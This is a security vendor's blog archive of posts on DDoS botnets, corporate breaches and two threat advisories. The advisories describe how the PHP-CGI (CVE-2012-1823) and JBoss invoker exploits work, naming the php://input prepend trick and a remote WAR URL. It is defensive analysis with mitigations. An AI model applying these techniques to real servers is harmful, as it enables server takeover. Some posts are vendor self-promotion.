Blog|Login|中文Deutsche日本語
46 posts categorized "Barry Shteiman"
April 02, 2014
 The rise of DDoS Botnets
Pin It

Last week, Incapsula released a report analyzing the latest trends on the DDoS front. The report exposes advancements in both network and application layers.

While the Incapsula report analyses in detail the different trends and types of DDoS attacks and their volumes, I would like to look into one of the really interesting aspects of their findings – the application DDoS attacks that are originating in botnets.

Last year we wrote extensively about the trend on CMS hacking for industrialized cybercrime where attackers use botnets in order to onboard infected machines into botnets and then use those as platforms for network and application attacks. For DDoS attacks, it just makes sense. When a hacker has the power of masses with a large botnet, there are great opportunities to disrupt service. When servers are being infected rather than user’s computers – its even worst, just because of the bandwidth and computing power that becomes available to the hacker.

Incapsula’s research demonstrates our findings from last year, with a large portion of the attacks coming from botnets. During 2013, Incapsula witnessed an increase of 240% in attack volume, and it is important to mention that many of them used the Wordpress CMS platform as the bot attack platform.

 

Incp1
 Figure: DDoS botnets geographic distribution 

 

DDoS bots become more complex

A few months ago we demonstrated in a Threat Advisory on a JBoss vulnerability, how easy it is to hijack a server for malicious intent,. but the hacker code was always quite simple in terms of abilities.

Incapsula, using its unique bot analysis mechanism, was able to isolate an interesting trend. The bots, while still primarily primitive, are evolving. More and more bots are advanced to a point where they can interact with the application itself mimicking a user.

 

Incp2

Figure: DDoS botnets geographic distribution

 

At the very least, this shows the direction that industrialized hackers are going. Realizing the potential in bots, hackers move to develop more advanced bots that can bypass classic solutions by incorporating the ability to disguise as a user or as a browser.

Here are some of Incapsula’s bot-related findings:

  • More than 25% of all botnets are located in India, China and Iran
  • 29% of botnets attack more than 50 targets a month
  • 29.9% of DDoS bots can hold cookies
  • 46% of all spoofed user-agents are fake Baidu Bots (while 11.7% are fake Googlebots)

Where can I learn more ?

  1. The Incapsula DDoS report, Here
  2. Incapsula’s infographic, Here

 

 

 

March 18, 2014
 Threat Advisory: PHP-CGI At Your Command
Pin It

For a long time, PHP has been the dominant server side framework for companies to write their web applications with. In fact, ~82% of all websites today are written in PHP. And while PHP’s power by numbers creates an appetite with security researchers to look for flaws leading to maturity, documentation, and security best practices– the numbers drive hackers to focus on it as well.

Php1

On October 2013, a public exploit in PHP was disclosed. The exploit uses a vulnerability found in May 2012 and was categorized as CVE-2012-1823. The exploit suggests that PHP, in conjunction with Apache, suffers from command injection vulnerability.

Soon after the exploit was released, Imperva honeypots detected web servers being attacked with this exploit in different flavors. In the three first weeks following the publication we were able to record as many as 30,000 attack campaigns using the exploit. As this was an interesting surge in attack activity, we decided to look deeper into the attack.

Later on, we picked up intelligence showing that different botnets have picked up the vulnerability per its effectiveness, and have also captured samples of bot clients that have embedded this vulnerability exploitation in them.

One of the interesting points is that despite the fact that this vulnerability is somewhat dated, cybercriminals are still using it, understanding that a major part of the install base of PHP does not update on a regular basis – thus creating the window of opportunity.

In this threat advisory, we will cover the following:

  • The technical background and analysis of the vulnerability and exploitation techniques
  • Samples of the attack vectors captured in the wild
  • Industrialized cybercrime aspects of this vulnerability
  • Mitigation techniques

 

A first look into the vulnerability

The vulnerability first appeared in the different vulnerability databases on 10-29-2013, and was identified with the CVE code 2012-1823. The exploitation code was soon available via different exploit websites

Php2

The vulnerability enables a remote attacker to execute arbitrary commands on a web server with PHP versions 5.4.x, 5.3.x before 5.4.2 or 5.3.12. These versions account for 16% of all public websites in the Internet.

Php3

 

The honeypot trail…

After having analyzed the attacks recorded by our honeypot, we learned few interesting facts:

  • The overall count of attackers (different source IP) was 324 while the overall count of targeted web server was 272. Most of the attacks originated from the US (35%), France (21%) and Germany (15%).

Php4

  • The most common URL used in the attacks was by far //cgi-bin/php (chart 1). Later on we will explain why the attack requires the exact location of the PHP CGI executable in order to succeed.

Php5

  • The biggest attacks in terms of volume were carried out in half a day or a day period.

Php6

  • The vast majority of the attackers (86 different attackers IPs) executed their attack in half a day or a one day period attacking a single target. As the attack period and the number of targets grew bigger, the number of attackers dropped significantly.

Php7

Technical Background and Analysis         

The vulnerability official (and somewhat confusing) description is: 

Php8

The simple, straightforward explanation is that an external attacker can set command line options for the PHP execution engine. Such command line options eventually allow the attacker to execute arbitrary PHP code on the server.

You might scratch your head and ask – haven’t we seen this before? The answer is YES! This vulnerability is not new and had previous public exploits published. 

Php9

In previous cases, the attack relied on the server configuration to redirect all PHP files to PHP CGI and thus making it vulnerable to code leakage, code execution and more. The new attack however, tries to access the PHP CGI directly and hence must use the exact location of the PHP CGI executable.

Before we move on, it is essential to understand what PHP CGI is and how it works. Common Gateway Interface (CGI) is a standard method used to generate dynamic content on web pages and web applications. PHP CGI means using the PHP interpreter through CGI mode. The web server will pass the data from the request to PHP (an external program); its input is a PHP file (usually on the server) and its output is HTML code (usually rendered in the client’s browser). PHP CGI configuration is set via PHP INI directives files.

The vulnerability allows remote attackers to place PHP command line options in the query string, including the “-d” option. This option defines PHP INI directive before running the PHPinterpreter. In this attack, the “-d” option is used to manipulate PHP security settings in order to bypass security checks and allow remote code execution.

Looking at sapi/cgi/cgi_main.c file from the vulnerable PHP code tree, we can find out which directives are used for the security checks:

Php10

The code indicates two PHP CGI settings - cgi.force_redirect and cgi.redirect_status_env

PHP configuration directive cgi.force_redirect prevents anyone from calling PHP directly with a URL. Since PHP turns this directive on by default, a direct access to PHP via http://example.com/cgi-bin/php will produce HTTP error code and the following error message

The PHP CGI cannot be accessed directly. This PHP CGI binary was compiled with force-cgi-redirect enabled.  This means that a page will only be served up if the REDIRECT_STATUS CGI variable is set, e.g. via an Apache Action directive.

Controlling cgi.force_redirectand cgi.redirect_status_env values enables the attacker to bypass PHP CGI security check.

Another crucial directive that is set using the “-d” option in the attack is auto_prepend_file. This directive specifies the name of a file that is automatically parsed before the main file; php://input isa read-only stream which in our case is the raw data from the request body.

By setting auto_prepend_file to php://input the payload of the attack (arbitrary PHP code) is introduced in the request body.

Attack vectors captured in the wild

Let’s take a look at an example attack vector that was captured in the wild

Php11

Which is translated to -

Php18

Not surprisingly, in the example attack vector above, the HTTP request body contained PHP code that downloaded and installed a botnet malware client –

Php12

Payloads analysis

We have managed to identify 43 different types of payload data in the attacks registered in our honeypot. The payloads appear to be botnet malware client constructed in the following pattern:

Php19

The PHP payload is designed to download a malware executable file from a remote server to an unsuspicious directory (/tmp, /dev/shm, /var/lock, /var/tmp), run it and hide it ever existed by removing it from the file system. The servers that host these files are usually legit, however compromised, servers and the file names are disguised as image files or text files.

The malware files are usually written in PHP, Python or C and vary from simple reverse shell backdoors, to IRC clients that connect to C&C servers. We also notice that some malwares have different functionality according to the kernel versions and the processor architecture of the infected server.

Php13

Php14

Our experience shows that this level of sophistication is linked with industrialized crime, also known as bot herding. The attackers in this case, scan for servers that are exposed to the vulnerability (using PHP CGI from vulnerable versions) to infect them with their bot clients, thus transforming them into zombies which receive commands from a C&C server under their control. These botnets are then sold or rented to the highest bidder.

A surprising fact is that even today, this vulnerability can be used successfully as companies don’t take the appropriate measures to secure their servers. Evidence to this fact can be found in active drop down sites that are still hosting the botnet clients, as shown in the following example:

Php15

 

Some of the botnets that we have been looking into are still active, some of them are relatively new and activity can be witnessed with commands being sent to their zombie servers that operate under their control.

 

It is a very intriguing point to show that cybercriminals understand the serious gap that exists between the time that a vulnerability is found in the wild, to the time it gets reported and patched (if third party software/framework is in the loop, such as PHP). Finally, there is a time lag until  a company becomes aware of both the issues and the fix – and implements it. This creates a window of opportunity for hackers to act on, as they know that the window will be open for a long time.

Php16

 

PHP Patch

PHP offers a patch (here) to mitigate the vulnerability. The code snippet below shows that PHP added a verification to ensure that the query string does not include command line options.

Php17

 

Mitigation Recommendations

  • Verify your PHP version is not vulnerable (i.e., PHP 5.3.12 and up, PHP 5.4.2 and up); if you still use a vulnerable PHP version, make sure it is patched
  • If it is possible, do not use PHP in CGI mode
  • Place your web application behind a web application security solution (such as a WAF) to protect it from web attacks such as this one

 

January 31, 2014
 Yahoo’s email breach, another 3rd party incident.
Pin It

IStock_000029358058MediumEarly last year, Imperva published a report analyzing a breach that Yahoo had suffered via a vulnerability on their astrology site. As a reminder, back then Yahoo’s astrology site was operating with data coming from a platform provided by a third party company. When that third party server was breached, Yahoo got the bad headlines.

Today, Yahoo disclosed a breach that effected their own mail system that apparently resulted from a third party hack. And while Yahoo definitely responded very fast to the incident, it raises questions for any company out there.

Companies should ask themselves:

  • How are we securing our users information and ourselves when we use third party services (which could be hosting, SaaS, call centers, authentication providers, website plugins and more)?
  • How much do we know about the security measures implemented by the third party companies we obtain services from?
  • If we provide a service to others, how secure is it?

Often, companies seem to put their trust in code and services that are not homegrown without knowing if they have the ability to monitor and secure said services.

What is the industry doing about it?

PCI v3.0 is a very good example of one regulation that addresses this issue, as it just added a mandate for service providers to secure their client information, making them accountable for the security of that data.

Where can I learn more?

  • Background information on last year’s Yahoo breach can be found in this HII report
  • Our webinar covering the most recent PCI v3.0 changes
  • Our CMS Hacking research, covering the implications ofthird party vulnerable applications

 

January 21, 2014
 The Impact of Insider Threats – The South Korea Episode.
Pin It

IStock_000008997674SmallYou can’t escape the data breach news that has spawned over the last few months. The recent high-profile hacks have raised market awareness.

Today, both CNN and Bloomberg covered the South Korean data breach that apparently hit ~40% of the South Korean population, about 20 million people.

In Layman’s Terms, What Happened?

At the center of the story is an employee who was working as a software engineer for three credit card companies. Over the course of a year and a half, this employee copied data from corporate servers to his personal drive. What makes this story particularly interesting is that the software engineer was writing anti-fraud software for the firms that he worked for during the same time that he was stealing data.

Business Impact? You Bet!

According to Bloomberg, 27 executives resigned following this incident, including bank CEOs and other senior management. Over half a million credit card users have already asked for new credit cards with many more to come. Perhaps the most significant impact is on the brand of the affected companies. Some companies never recover from the brand damage caused by such a massive security breach.

Key Takeaway

There are opportunities to prevent these sort of breaches. Audit and a properly deployed behavior alerting system could and should have flagged abnormal behavior from a user with privileged access. In this case, a software engineer who needed access to perform his job was copying massive amounts of data over time. From a security standpoint, a simple “rule” that alerts IT when a user accesses massive amounts of sensitive data over time would have caught him in his tracks.

 

December 18, 2013
 Website Traffic is Tipping in Favor of Automated Clients
Pin It

IStock_000019628807SmallIncapsula, Imperva’s subsidiary focused on cloud-based application security, just released its annual Bot Traffic Report for 2013 that analyzed 1.45 Billion visits over a 90 day period; concluding that automated web traffic is on the rise. Traffic from these bots now makes up as much as 61.5% of all website traffic, which is an increase of 21% from last year’s report. This automated traffic includes good bots such as search engines as well as malicious traffic like site scrapers, hacking tools, comment spammers and other homegrown bots.

One potential contributing factor is the continued proliferation web services. New online services are being created at a record pace, bringing with them new bots scouring the internet for information.  As these bots crawl the internet, they bring with them bandwidth consumption and service degradation.

 

Another possible explanation is that botnet creators are developing new tools and infecting bots with increasingly ingenious social engineering tactics.  Brian Krebs of Krebs on Security, released a blog post this morning dissecting a new malicious Firefox plugin that infects PCs and automatically probes any websites visited with the infected browser for SQL Injection vulnerabilities and then reports the results back to the botnet’s control center.  As of the time of writing, this botnet had already infected more than 12,500 systems, illustrating how easy it is for today’s botnet farmers to assemble powerful networks of infected computers.

With web services being increasingly weaved into the fabric of our online lives, and botnets growing in size and sophistication, it is likely that this trend of automated web traffic will show no signs of abatement in the near future.

 

December 11, 2013
 HII: Assessing the threat landscape of DBaaS
Pin It

CloudOver past few years we’ve seen an ever-growing tide of data breaches with reports of new breaches coming out almost every day. Having said that, there are still very few published details on how actual data exfiltration happens. This is mainly due to the fact that organizations that have been breached are hesitant to share information other than what they are obligated to share by law.

As a result, while there is quite a lot of information on how endpoints become infected as well as on what the Command and Control (C&C) communication looks like (IP reputation, etc.), there is almost none on what the threat looks like from enterprise data center point of view. There are lots of discussions about the need to share information, and for a good reason. Unfortunately, these discussions have not necessarily translated into actual sharing.

Lack of insight greatly hampers the ability to develop effective security measures. Statistics are always open to interpretation, and because the security industry is left to reply on statistical analysis, security strategies are often left with a gaping hole.

To fill that void, we constantly conduct research to understand the properties of potential threats to data centers. Our latest Hacker Intelligence Initiative report, “Assessing the Threat Landscape of DBaaS” is the latest result of this research initiative.

What does DBaaS has to do with it?

Data centers are no longer confined to the enterprise perimeter. More and more enterprises take their data to the cloud, but forget to adjust their risk management practices when doing so. The recent MongoHQ breach is just one example of this type of oversight.

While we didn’t find malware that directly attacked a database, our research did find and analyze malware with a module able to connect to Microsoft MSSQL. Moreover, the research found that this malware was used to automatically connect to MSSQL cloud service for both C&C and data exfiltration purposes.

As an interesting side note, we also stumbled upon a cool sample after the writing of this report: malware that brought its own MySQL dll library to the infected machine. This fact correlates with our assessments of growing trends in data center security threats.

What’s in the Report?

The report shows how attackers took advantage of hosted database services in order to set up their own C&C and Drop servers. The servers lead us to some interesting insights about the advantages of using “malicious” hosted data-stores, and the risks they present to legitimate users. For example, enterprises need to re-asses the severity of database vulnerabilities in a hosted environment.

Analyzing the attackers data-store also revealed interesting points. For example, the targeting of business platforms. In conclusion, we predicted what we believe are growing trends in the data-store threat landscape.

Where can I learn more?

  1. Our Hackers Intelligence Initiative (HII) report, can be found here
  2. The Blog on the MongoHQ breach, here
  3. A Forbes article, looking into the DBaaS trend, here
  4. An Oracle user group research, covering what users are really doing with audit and security problems, here 

 

November 27, 2013
 1.2M Loyaltybuild Customers' Data Breached - Why?
Pin It

IStock_000008861249SmallLast week Ireland’s Office of the Data Protection Commissioner (ODPC) reported that loyalty marketing company, Loyaltybuild had been hit with a major data breach. The breach, affecting at least 1.2 million customers, resulted in loss of customer names, addresses, phone numbers and email addresses in addition to 376,000 credit card numbers (CCN).

 In statement on their website, Loyaltybuild wrote:

           "We have ceased taking bookings on our website and over the phone" 

According to their website, Loyaltybuild was established in 1999 and is “backed by sophisticated web, booking engine and database technologies, designed for large-scale campaigns in one or more languages.” 

Unfortunately, Loyaltybuild was also storing unencrypted sensitive information, and too much of it at that. As if CCN data is not enough, CVV numbers (PCI-DSS requirements prohibit the storage of these) were also compromised. There is very little reason for Loyaltybuild to hold CCN information (especially unencrypted) and no reason to store CVV numbers.

Let’s talk about the numbers: hundreds of thousands of credit card records and more than a million records of additional information (email, addresses, etc.) is a lot to exfiltrate. Data monitoring should have alerted to such a large number of records being read or moved - especially when it was moved outside of the organization.

According to reports, some of the data was historical (from 2011 - 2012). Historical records - that are less frequently accessed - should have raised an even bigger flag.

As 'sophisticated' as this breach might prove to be, a simple monitoring of data records could have alerted security personal and might have prevented this breach. Most would agree that copying a million records is worth opening a ticket to IT Security team.

Another recent security event, the MongoHQ breach, revealed the dangers of attacks on service providers: ‘hack one hack them all.’ The service provider is not the only one on the receiving end of these attacks - their customers are as well. 

After the MongoHQ breach we advised that customers take responsibility for their sensitive data and know how their business partners are securing it. In the Loyaltybuild case, customers agreed to share too much, in plaintext, with no guarantees. When using third party services businesses should share the bare minimum of information with their partners. This is particularly true of sensitive information.

In both cases, simple encryption of the sensitive data might have minimized the fallout. Moreover, in both cases customers were way too trusting with their service provider.  Whether  a cloud-based startup or an established business like Loyaltybuild, customers need to protect themselves and not assume their service providers will do the job for them.

Security is based on trust; however, given these recent breaches, trust is increasingly difficult to come by.

 

November 18, 2013
 Threat Advisory: A JBoss AS Exploit, Web Shell code Injection.
Pin It

IStock_000007435099SmallJBoss Application Server (or JBoss AS) is an open-source Java EE-based application server. JBoss AS was developed by JBoss, now a division of Red Hat. On late 2012, JBoss AS was named as WildFly.

Recently, Imperva’s ADC had detected a surge in the exploitation of web servers powered by the JBoss AS, probably as a result of the public disclosure of an exploit code that abuse this vulnerability.

The vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server. Once the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that Application Server.

While the vulnerability is not new by itself and is known for at least two years, it is amazing to realize that during these years the attack surface had not decayed, but in fact had grown in terms of the number of the vulnerable web application.

The Incident Timeline

On 2011, a JBoss AS vulnerability had been presented in security conventions. Researchers showed that JBoss AS is vulnerable to remote command execution via the ‘HTTP Invoker’ service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB).

On September 2013, NIST had assigned a code execution vulnerability in certain HP products that utilized JBoss AS with a Common Vulnerability Enumeration (CVE-2013-4810).

On the 4th of October 2013, a security researcher, have made the exploit publicly available. Immediately thereafter, we had witnessed a surge in Jboss AS hacking, which manifested in malicious traffic originated from the infected servers and observed in Imperva’s honey pots array. 

The Exploit’s Technical Analysis

Jboss AS is vulnerable to remote command execution via the ‘HTTP Invoker’ service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB).

Java Beans are reusable software components for Java represented as a serializable Java Object. MBean, which stands for Managed Bean, is a type of Java Bean.  javax.management.ObjectName represents the object name of an MBean.  Mbeans are usually used in Java Management Extensions (JMX) technology. Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices and service oriented networks. Those resources are represented by MBeans.

JMX uses a 3-level architecture:

  1. The Probe level contains MBeans
  2. The Agent level, or MBeanServer, is the core of JMX. It acts as an intermediary between the MBean and the applications.
  3. The Remote Management level enables remote applications to access the MBeanServer through connectors and adaptors. A connector provides full remote access to the MBeanServer API while an adaptor translates requests between a given protocol (e.g. HTTP, RMI) and a specific JMX functionality. The Invoker invokes the proper MBean service based on the actual JMX request.

J1
 

Figure 1 JMX architecture

The detached Invoker allows MBean services to expose functional interfaces via arbitrary protocols for remote access by clients. The HTTP Invoker service, including EJBInvoker and JMXInvoker, includes a servlet that processes posts of marshaled (serialized) org.jboss.invocation.Invocation objects that represent invocations that should be dispatched onto the MBeanServer. Effectively this allows access to MBeans that support the detached invoker operation via HTTP POST requests.

The Vulnerability is composed of public HTTP access to EJBInvokerServlet or JMXInvokerServlet servlets, represented as URL /invoker/EJBInvokerServlet and /invoker/JMXInvokerServlet respectively, and invocation of the MainDeployer MBean. The MainDeplyoer MBean is responsible to deploy a WAR from a remote location.

The recently published exploit, abuses invoker/EJBInvokerServlet to deploy a web shell code that enables the hacker to execute arbitrary Operating System commands on the victim sever’s  system.

  J2

Figure 2 Exploit code

The exploit consists of a two steps process:

On the first step, the exploit abuses the EJBInvokerServlet to deploy the malicious Web application ARchive (WAR) from the remote URL http://retrogod.altervista.org/a.war that includes the ”a/pwn.jsp” shell code

  J3

Figure 3 A network capture of the malicious web shell injection as reproduced in Imperva's lab

On the Second step, the exploit sends an operating system command to the injected web shell

J4

Figure 4 A network capture of the commands sent to the malicious web shell injection as reproduced in Imperva's lab

In The Wild Exploitation 

Although this specific JBoss AS security issue has been known to the security community for a few years, it is amazing to realize that during these years the attack surface had not decayed, but in fact had grown in terms of the number of the vulnerable web application.

The number of server exposing their JBoss management interfaces had more than tripled itself (7,000 to 23,000) since the vulnerability was presented on 2011. 

 J5

Figure 5 Exposed JBoss' Management interfaces - October 2013 (Google Dork here)

J6

Figure 6 Exposed JBoss' Management interfaces - 2011

The list of the exposed sites contains some governmental and educational sites. We had identified some of them to be actually infected with a web shell code.

Many of the deployed web shells utilize the original pwn.jsp shell code that was presented with the original exploit, as can be seen in a blog entry posted by one of the attack’s victims.

Figure 5 Blog entry on a server infected with pwn.jsp

On other cases a more powerful web shell was deployed. In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities.

J7
 

Figure 6 JspSpy User Interface

Recommendations and Mitigation

  • JBoss users should harden their web application according to JBoss manual
  • Imperva’s customers have been updated with a signature to prevent unwanted access to the vulnerable JBoss AS servlet via our regular content updates.

Where can I learn more?

 

November 14, 2013
 A Look Into The MongoHQ Breach – Protect Your (Big) Data
Pin It

IStock_000020541258SmallA recent security breach in MongoHQ (a MongoDB cloud services provider) left the company working hard to patch up security holes. Unfortunately common, this breach was only detected when one of MongoHQ’s customers (Buffer) realized they had been hacked.

Following the attack, MongoHQ did the right thing: they apologized to their customers, detailed their security flaws (some are quite staggering) and laid out what actions they are taking to mitigate security. 

Although the actions that MongoHQ took do improve security, data service providers and customers should ask themselves if their data is ever secure enough.

Once the data provider is breached, its customers are the first to suffer. And when discussing service providers, “small” hacks have a potentially exponential effect. Once a single server has been breached, all of the databases and the customers that own them are breached.

You’re the weakest link!

If you’re a data service provider with hundreds or even thousands of customers, getting hacked is only a matter of when – and when will it happen again.

Targeted attacks look for the weakest link in terms of security. When the weakest link is the data service provider and not the customer, the attackers might get greedy and not settle for just one target. A quote from MongoHQ :

“Currently, it appears that the unauthorized user was scanning for social media authentication information for spamming purposes, and probing for financial information in customer database”

Here are some of the issues that made the MongoHQ hack possible:

  • A support application was accessible through the web and not behind a VPN
  • Customer data was visible to users of this support application (what if the compromise was of an employee?)
  • Two factor authentication was not implemented
  • There was no User Rights Management

Securing data requires, well, some data security

Even Though many factors were responsible for this breach (such as “Excessive and Unused Privileges”, “Privilege Abuse” and “Unmanaged Sensitive Data”), MongoHQ breach root cause is an example of one of Top Ten Database Threats: “Limited Security Expertise and Education”:

“Internal security controls are not keeping pace with data growth and many organizations are ill-equipped to deal with a security breach. Often this is due to the lack of expertise required to implement security controls, policies, and training.”

This means that organizations should rely on the security expertise of 3rd party businesses instead of inventing the wheel or simply closing their eyes. Data security is a business of its own; Data service providers shouldn’t be surprised when breaches occur to non-secured data, and their security learning curve - and their customers (the ones that are left) - can be quite long and painful.

Since the breach, MongoHQ took very significant security measures, but mainly they utilized third-party validation of their security.

With Big Data Comes Big Responsibility

Limited security expertise and education is not only the service provider’s problem, it is also a real concern for its consumers. Were MongoHQ customers aware that their sensitive data was visible to the MongoHQ support application? Do you know who can access your data? How is it stored? Can it be copied?

These are all questions that are all too often forgotten, especially for young startup companies eager to build applications and avoid dealing with security and management costs.

Customers need to know what their service providers are doing to protect their data. This has recently become a new mandate with the rise of PCI-DSS v3.0, where service providers are now accountable for protecting the data of their customers. Data center security needs to be out in the open, especially “up in the cloud”.

While making your data somebody else’s problem is a nice fantasy, you are still accountable when it’s stolen or corrupted. You can’t guarantee your data availability when using a data service provider, but you can at least improve its integrity and confidentiality.

Joel Gascoigne from Buffer also realized this when he wrote on Hacker News:

“I want to be clear that this is still our fault. If access tokens were encrypted (which they are now) then this would have been avoided”.

You as a customer would be smart to take responsibly of your own data. Recognize where your sensitive data is and prepare for the inevitable day when it is compromised.    Additionally, we as customers need to hold our service providers accountable for security instead of just “taking their word.”

 

November 07, 2013
 Incapsula Pen-Test – Part Deux!
Pin It

IStock_000011598938SmallIn 2013, we have been fortunate enough to receive a lot of positive attention for Incapsula product line.  In addition major news coverage garnered by stopping one of the internet’s largest unamplified DDoS attacks, and being ranked by TopTenReviews as the #1 DDoS mitigation service in head-to-head bake off against 9 of our competitors, Incapsula has recently passed a 3rd party pen test with flying colors.

Last week, a new and comprehensive WAF pentest was published, comparing Incapsula’s WAF to CloudFlare’s new Rule-based WAF, the analysis can be downloaded here

The effort was made by Zero Science Lab, who also conducted the last penetration test comparison back in February this year. Zero Science Lab decided to run a “Round 2” penetration test after CloudFlare announced the launch of a new Rule-based WAF in August.  

Excerpts from Zero Science Lab’s Conclusion:

“From the results tables, we can see that Incapsula's WAF continues to have an advantage over CloudFlare's WAF. We should also mention that only Incapsula's WAF is PCI-Certified, which is an advantage for certain types of online businesses.

While CloudFlare's new WAF solution showed substantial improvement since the first penetration test, it still does not provide the comprehensive level of security against certain types of web application attacks (e.g., SQL injection, Remote File Inclusion) that many online businesses today require.

We noticed the high block ratio of XSS attacks, but from all the types of attacks, main focus was on Cross-Site Scripting. The SQL Injection, Local and Remote File Inclusion, and Remote Code/Command Execution attacks had very low detection rate by the CloudFlare WAF.

Incapsula, on the other hand, has shown consistent security performance in both tests, with a high block ratio and few false-positives.”

It was also great to see that our the Incapsula fingerprinting engine triumphed:

"What’s also important to note is that Incapsula can recognize an ongoing attack and block attacker's session. We specifically noticed this during the test using automated tools such as ZAP and Burp. Their blocking mechanism seems to be based on recognizing the fingerprint of the tool being used, so even if you try to trick it by changing the default User-Agent or manipulating other header fields, the WAF will still block your session. We didn't notice such mechanism on CloudFlare's WAF. CloudFlare blocks a session only if an attacker tries to manipulate and send invalid headers"

Our Followup

We have worked through the findings of this report, and patched and adapted to the tests that originally went through. The Incapsula cloud WAF now stops all vectors specified. 

 

 

 

 

Find Us Online
RSS Feed - Subscribe Twitter Facebook iTunes LinkedIn YouTube
Authors
Monthly Archives
Email Subscription
Sign up here to receive our blog: